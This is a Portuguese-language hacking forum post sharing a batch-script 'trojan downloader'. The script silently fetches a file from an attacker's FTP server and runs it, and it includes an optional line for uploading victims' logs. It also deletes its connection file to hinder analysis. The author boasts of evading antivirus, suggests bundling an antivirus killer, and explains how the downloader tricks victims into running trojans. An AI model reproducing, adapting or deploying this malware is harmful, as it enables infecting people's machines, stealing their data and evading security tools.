Trojan Downloader em Batch Script By 1NT3RC3PT0R

[1NT3RC3PT0R]

Hello gurizada! É o seguinte, não sei se é permitido aqui no Darkers, se não for, moderadores deletem ok.

Bom eu estava a um tempo já tentando conectar a um servidor ftp, por Batch mas nunca dava certo. Agora deu UHAUahuH, e o resultado esta ai.

Para utilizar ele você deve configurar de acordo com seus dados de conexão ao servidor. Atenção também com  o nome que seu trojan está. Analize o código, para ter certeza de que tudo esta de acordo com seus dados ok.

Code Select Expand

@ECHO OFF
@BREAK OFF
TITLE TROJAN DOWNLOADER EM BATCH SCRIPT BY 1NT3RC3PT0R

:: TROJAN DOWNLOADER EM BATCH SCRIPT BY 1NT3RC3PT0R
:: ESTA VERSÃO PERMITE UTILIZAR SERVIDORES FTP QUE REQUEREM AUTENTICAÇÃO
CLS
ECHO.

::INICIANDO A CRIAÇÃO DO ARQUIVO _1NT3RC3PT0R QUE ARMAZENA OS DADOS DE CONEXÃO AO SERVIDOR FTP.

::COLOQUE O ENDEREÇO DO SER SERVIDOR FTP
ECHO.open servidor ftp>%TEMP%.\_1NT3RC3PT0R

:: COLOQUE O SEU LOGIN DO SERVIDOR
ECHO.seul ogin>>%TEMP%.\_1NT3RC3PT0R

:: COLOQUE A SENHA PARA LOGAR NO SEU SERVIDOR
ECHO.sua senha>>%TEMP%.\_1NT3RC3PT0R

::USA O MODO BINARIO PARA O TRAFEGO DOS ARQUIVOS.
ECHO.binary>>%TEMP%.\_1NT3RC3PT0R

:: COLOQUE A PASTA DO SEU SERVIDOR ONDE OS ARQUIVOS ESTÃO. O PADRÃO É /, QUE É A RAIZ DO SERVER.
ECHO.cd />>%TEMP%.\_1NT3RC3PT0R

:: AQUI VOCÊ VAI COPIAR OS ARQUIVOS DO SERVIDOR, OU VAI UPAR SEUS ARQUIVOS PARA O SERVIDOR
::PARA UPA COLOQUE O CAMINHO DO ARQUIVO E REMOVA OS :: DA FRENTE DA LINHA ABAIXO.
:: MUITO BOM PARA UPAR LOGS DAS MÁQUINAS.

::ECHO.put C:\arquivo.txt>>%TEMP%.\_1NT3RC3PT0R

::PARA BAIXAR ALGO DO SERVIDOR, COLOQUE O NOME DELE ONDE ESTA ESCRITO TROJAN.EXE
ECHO.get trojan.exe>>%TEMP%.\_1NT3RC3PT0R

ECHO.quit>>%TEMP%.\_1NT3RC3PT0R
:: PRONTO, ARQUIVO DE CONEXÃO CRIADO, AGORA VAMOS PARA A EXECUÇÃO DA CONEXÃO

ECHO.
TYPE %TEMP%.\_1NT3RC3PT0R
ECHO.

ftp -i -s:%TEMP%.\_1NT3RC3PT0R>NUL
:: PARA ESCONDER TODA A AÇÃO DA TELA USE ESTA LINHA: ftp -i -s:%TEMP%.\_1NT3RC3PT0R>NUL
:: PARA CRIAR UM LOG DA CONEXÃO, ADICIONE ESTA LINHA: ftp -i -s:%TEMP%.\_1NT3RC3PT0R>LOGFILE.TXT

:: DELETA O ARQUIVO _1NT3RC3PT0R QUE FOI USADO PARA ARMAZENAR OS DADOS  DA CONEXÃO COM O SERVIDOR
DEL %TEMP%.\_1NT3RC3PT0R
:: ASSIM SE A PESSOA TENTAR ANALIZAR ESTE TROJAN, ELA NAO TERÁ OS DADOS DO SEU SERVIDOR.

::AGORA QUE VOCÊ BAIXOU O ARQUIVO DO SERVIDOR, PODE RODALO A VONTADE, PARA ISSO SO MODIFIQUE O NOME DELE ABAIXO.

START trojan.exe



:: ESTE CÓDIGO FOI FEITO SOMENTE PARA ESTUDOS, EU NÃO ME RESPOSABILIZO PELO USO QUE AS PESSOAS VENHAM A FAZER DESTE CÓDIGO.
:: By 1NT3RC3PT0R

EXIT
Muito bem, como vocês estão vendo este batch cria um arquivo onde fica armazenado os dados do servidor, como link, username, pass entre outras coisas. Depois ele roda este arquivo das configurações, conectando com o server.
Feito isso ele roda o trojan na máquina, ai é só maravilha hehehe.

Quanto a detecção dele.
NOD32 não pegou nada, e é quase certo que os outros avs também não vão pegar por enquanto heheh

Bom mas quando ele baixar o trojan o av vai detecta o trojan, ai você pode por um killer junto no trojan downloader, dependo do que você quiser.

Porque você deve utilizar o Trojan Downloaders.
Simples, você não precisa por o link do seu trojan nas seings (acho que é assim o nome), se a pessoas passar o executavel no seu av ela logo perceberá que é um virus. Bom você usando o Downloader,  ela baixa e passa no seu anti virus que não detectará nada por enquanto(até um babaca passar no virustotal), e vai confiar no arquivo e irá roda-lo. Acho que vocês entenderam.
Outro ponto, é que você pode contaminar pessoas com varios trojan só mudar no seu servidor ftp, e ainda fazer outras coisas dependendo da sua imaginação e conhecimento em Batch Script.

Espero que tenha ficado claro para vocês, qualquer coisa fala ai!

ATENÇÃO: eu não responsabilizo-me pelo seus atos usando este código. Use por sua conta e risco.

BY 1NT3RC3PT0R